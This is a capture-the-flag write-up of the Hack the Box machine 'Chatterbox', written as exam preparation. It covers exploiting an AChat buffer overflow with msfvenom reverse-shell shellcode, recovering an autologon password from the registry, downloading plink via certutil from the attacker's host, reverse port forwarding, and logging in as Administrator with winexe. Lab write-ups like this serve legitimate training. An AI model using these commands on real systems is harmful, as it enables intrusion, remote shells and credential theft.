Hack the Box: Chatterbox Write-up

As part of my road to the eCPPT exam, I am doing a series of write-ups on OSCP like boxes as suggested by @TJ_NULL on Twitter, and JSON SECS OSCP Prep List.

Chatterbox was a fun box that uses a buffer overflow to get a foothold, and escalation to Administrator by port forwarding to access hidden services to authenticate to as Administrator.

First we will start of with an Nmap scan to view open ports and services:

nmap -A -p- -T4 10.129.62.202

(Note, I am using a private instance of Hack the Box so the machine IP will likely be different than yours)

From the scan results, it looks like there are two ports open: 9255 and 9256 and it is running a service called AChat.

Using searchsploit, we can see if there are any known exploits for this program.

It looks like this program is vulnerable to a remote buffer overflow. I opted for the non-metasploit version of this and copied it into my working directory. Inspecting the code, the author included the msfvenom command used to generate the payload. However, it was just spawning a calculator. Which is not super useful for our purposes.

Lets modify the command a little bit and generate new shellcode that will get us a reverse shell.

msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.10.14.84 LPORT=4445 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python 

Taking the shellcode output and amending the exploit, we also need to change the server address to point to the correct IP.

Now that we have the shellcode to generate a reverse shell and added the IP of the machine we are attacking, we can open up a netcat listener, on port 4445 in my case, and fire this off.

nc -nvlp 4445

And we get a shell on the box as user Alfred!

Now, since we are not a privileged user on this box, let’s start trying to escalate our privileges. I used this Windows Privilege Escalation Guide and started going down the list looking for some low hanging fruit.

As I went through the section on searching for passwords, searching the Windows autologin Registry turned up something interesting:

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"

It looks like we just found the password for Alfred!

Next, I looked at all the services running on the box with netstat, which showed something interesting as well.

netstat -ano

During our nmap scan, ports 9255 and 9256 were the only ones showing as open. But here, it shows that 139 is listening as well. Moreover, it looks like ports 135 and 445 are also listening. The only problem, is these ports are only available inside the network. We will have to forward the port so that we can connect to it from our attacker machine.

To do this we can use Plink which you can download here (make sure to download the 32 bit version).

Once it’s downloaded, we need to get it on to our victim machine. From inside Alfred’s home directory (since we have write access there) we can use Python to run a http server on our machine and use certutil to download the file from the victim machine.

On Kali machine: python3 -m http.server

On victim machine: certutil -urlcache -f http://<your_ip>:8000/plink.exe plink.exe

Now that we have everything on the victim machine in place, we need to get our Kali machine in order. First, we need to make sure we have an ssh server running.

If you don’t have ssh installed, you can do so with apt install ssh and make sure it’s started with service ssh start

Next, we need to edit /etc/ssh/sshd_config and change PermitRootLogin to “yes”.

I also changed the ssh port to 2222 instead of 22 because Hack the Box did not like connecting on port 22 for some reason.

Once we have those settings changed, reload the ssh config with service ssh reload

Now that that’s all squared away, we will use Plink to connect back to our Kali machine from the victim machine, forwarding port 445 so we can connect to it.

plink.exe -P 2222 -l root -pw toor 10.10.14.84 -R 445:127.0.0.1:445

And now we essentially logged in to the Kali machine from the victim machine. But we have made port 445 available to us on our Kali machine, which we can confirm with netstat.

Now, Kali has a way for us to execute Windows commands using winexe which we will use to try and authenticate as Administrator using the password we discovered earlier and launch a command prompt.

winexe -U Administrator%Welcome1! //127.0.0.1 "cmd.exe"

And we get a shell as Administrator!